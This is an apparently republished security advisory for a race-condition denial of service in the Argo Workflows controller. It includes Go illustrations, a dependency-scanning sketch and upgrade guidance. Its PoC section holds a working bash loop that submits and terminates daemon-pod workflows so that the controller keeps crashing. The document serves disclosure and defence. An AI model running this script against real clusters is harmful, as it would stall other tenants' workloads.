GHSA-ghjw-32xw-ffwr
MEDIUM
Argo Workflows Controller: Denial of Service via malicious daemon Workflows
Description
Summary
Due to a race condition on a global variable, the Argo Workflows controller can be made to crash on demand by any user with permission to execute a workflow.
This was resolved by https://github.com/argoproj/argo-workflows/pull/13641
Details
The two lines linked below introduce a data race in the underlying SPDY implementation of the Kubernetes API client. If a second request is made before the first completes, the controller panics with a nil pointer dereference.
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L49
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L75
The race appears to have been introduced in commit https://github.com/argoproj/argo-workflows/commit/9756babd0ed589d1cd24592f05725f748f74130b (#13265), first released in v3.6.0-rc1.
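The failure mode described in this section can be illustrated with a minimal Go sketch. It is not the Argo Workflows or Kubernetes client code: the `stream` type, the `current` variable, and both request functions are hypothetical names chosen for illustration. The sketch assumes the general shape the advisory describes, where per-request state lives in a package-level variable, so an overlapping request can find it nil.

```go
package main

import (
	"fmt"
	"sync"
)

// stream is a hypothetical stand-in for per-request connection state.
type stream struct{ id int }

func (s *stream) send() int { return s.id }

// current is package-level state shared by every request: the unsafe part.
var current *stream

// unsafeRequest stores its state in the shared variable and clears it when
// done. If two calls overlap, one can set current to nil while the other is
// still using it, and send then dereferences a nil pointer.
func unsafeRequest(id int) int {
	current = &stream{id: id}
	defer func() { current = nil }()
	return current.send()
}

// safeRequest keeps its state local to the call, so concurrent calls cannot
// interfere with each other.
func safeRequest(id int) int {
	s := &stream{id: id}
	return s.send()
}

// sumSafe runs n safe requests concurrently and adds up their results.
func sumSafe(n int) int {
	var (
		wg    sync.WaitGroup
		mu    sync.Mutex
		total int
	)
	for i := 1; i <= n; i++ {
		wg.Add(1)
		go func(id int) {
			defer wg.Done()
			v := safeRequest(id)
			mu.Lock()
			total += v
			mu.Unlock()
		}(i)
	}
	wg.Wait()
	return total
}

func main() {
	// The unsafe variant only works when calls never overlap.
	fmt.Println("sequential unsafe request:", unsafeRequest(7))
	// The safe variant tolerates any number of concurrent calls.
	fmt.Println("sum of 100 concurrent safe requests:", sumSafe(100))
}
```

Calling `unsafeRequest` from several goroutines at once is deliberately left out of `main`. Building such a variant with `go run -race` would be one way to have the Go race detector report the conflicting accesses to `current`.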
PoC
With the KUBECONFIG variable pointing to a kubeconfig file whose credentials have create permission for the Workflow kind, execute the following bash script:
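#!/bin/bash -xeu

while true ; do
    # Submit a workflow that starts three daemon pods and capture its name
    # from the first line of the "argo submit" output.
    name=$(
        { argo submit /dev/stdin <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: curl-
spec:
  entrypoint: main
  templates:
  - name: main
    dag:
      tasks:
      - name: no-op
        template: no-op
        withSequence:
          count: 3
  - name: no-op
    daemon: true
    container:
      image: alpine:3.13
      command: [sleep, infinity]
EOF
        } | head -n1 | awk '{ print $2 }'
    )
    # Terminate the workflow in the background after 30 seconds.
    ( sleep 30; argo terminate "$name" ) &
    # Submit the next workflow 15 seconds later.
    sleep 15
done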
This script creates, and subsequently cleans up, multiple daemon pods in rapid succession. Each pod cleanup executes a kill instruction through the Kubernetes exec API, which triggers the conditions for the panic. The symptom is that the pods are marked as complete but the workflow itself never completes. The controller logs then show the controller panicking and restarting every few seconds. Where restarts are subject to exponential backoff (e.g. when the controller runs in a Kubernetes Pod), the crashes are frequent enough to extend the backoff significantly and leave other workflows stalled.
Because the restarted controller believes it has already sent the kill signal, it waits indefinitely for the pod to terminate, which never happens. The attacker must therefore constantly garbage-collect their own workflows with the argo terminate command; otherwise the maximum number of concurrently running workflows will be reached. A more sophisticated attack could detect when the workflow has been signaled to clean up and terminate it at that point, instead of relying on a simple timer.
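To show why repeated crashes stall other workflows for so long, the sketch below works through the restart delays under exponential backoff. It assumes the default kubelet behavior described in the Kubernetes documentation (a 10 second initial delay that doubles after each crash and is capped at 5 minutes); these values and the function name `restartDelay` are assumptions for illustration, not taken from the advisory.

```go
package main

import (
	"fmt"
	"time"
)

const (
	baseDelay = 10 * time.Second // assumed initial restart delay
	maxDelay  = 5 * time.Minute  // assumed upper bound on the delay
)

// restartDelay returns the assumed wait before the container is restarted
// after the given number of consecutive crashes (1 = first crash).
func restartDelay(crashes int) time.Duration {
	d := baseDelay
	for i := 1; i < crashes; i++ {
		d *= 2
		if d >= maxDelay {
			return maxDelay
		}
	}
	return d
}

func main() {
	var total time.Duration
	for n := 1; n <= 7; n++ {
		d := restartDelay(n)
		total += d
		fmt.Printf("crash %d: wait %v (cumulative downtime %v)\n", n, d, total)
	}
}
```

Under these assumptions the delay reaches its cap after six consecutive crashes, so a controller that panics shortly after every restart spends most of its time waiting to be restarted rather than reconciling workflows.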
Impact
A malicious user with permission to create workflows can continually submit workflows that do nothing except create and then clean up multiple daemon pods, resulting in a crash loop that prevents other users' workflows from running. This requires only a handful of pods and very little CPU and memory, so typical multi-tenant Kubernetes controls such as Pod count limits and resource quotas do not prevent it.
Because the panic log gives no indication that the issue is related to daemon pods, and an attacker could easily disguise these daemon pods as part of a genuine workflow, it would be difficult for administrators to discover the root cause of the DoS or to identify the individuals responsible so that their access can be removed.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| Go | github.com/argoproj/argo-workflows/v3 | ≥ 3.6.0-rc1, < 3.6.0-rc2 | 3.6.0-rc2 |
Detection & mitigation playbook
Open-source dependency
Detect
Scan your Go dependency tree (go.mod, go.sum) for github.com/argoproj/argo-workflows/v3. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
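As a rough illustration of the manifest check, the sketch below scans the text of a go.mod file for the affected module and flags the vulnerable release. It is a simplification under stated assumptions: the helper names `findVersion` and `isVulnerable` are hypothetical, only the exact tag v3.6.0-rc1 is matched (pseudo-versions and `replace` directives are ignored), and a real scanner should use proper semantic version comparison against the range in the table above.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

const modulePath = "github.com/argoproj/argo-workflows/v3"

// findVersion returns the version required for modulePath in the given
// go.mod content, or "" if the module is not required.
func findVersion(goMod string) string {
	sc := bufio.NewScanner(strings.NewReader(goMod))
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		// Drop a leading "require" so single-line and block forms look alike.
		if len(fields) > 0 && fields[0] == "require" {
			fields = fields[1:]
		}
		if len(fields) >= 2 && fields[0] == modulePath {
			return fields[1]
		}
	}
	return ""
}

// isVulnerable reports whether v is the affected release candidate.
// Assumption: only the exact v3.6.0-rc1 tag is treated as vulnerable.
func isVulnerable(v string) bool {
	return v == "v3.6.0-rc1"
}

func main() {
	sample := `module example.com/demo

go 1.22

require (
	github.com/argoproj/argo-workflows/v3 v3.6.0-rc1
)
`
	v := findVersion(sample)
	fmt.Printf("found %s %s, vulnerable: %t\n", modulePath, v, isVulnerable(v))
}
```

In practice the file content would be read from disk, for example with `os.ReadFile("go.mod")`, instead of the inline sample used here.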
Fix
Update github.com/argoproj/argo-workflows/v3 to 3.6.0-rc2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-ghjw-32xw-ffwr is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature (daemon templates) and restrict permission to create Workflows to trusted users, since any user who can submit a Workflow can trigger the crash. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.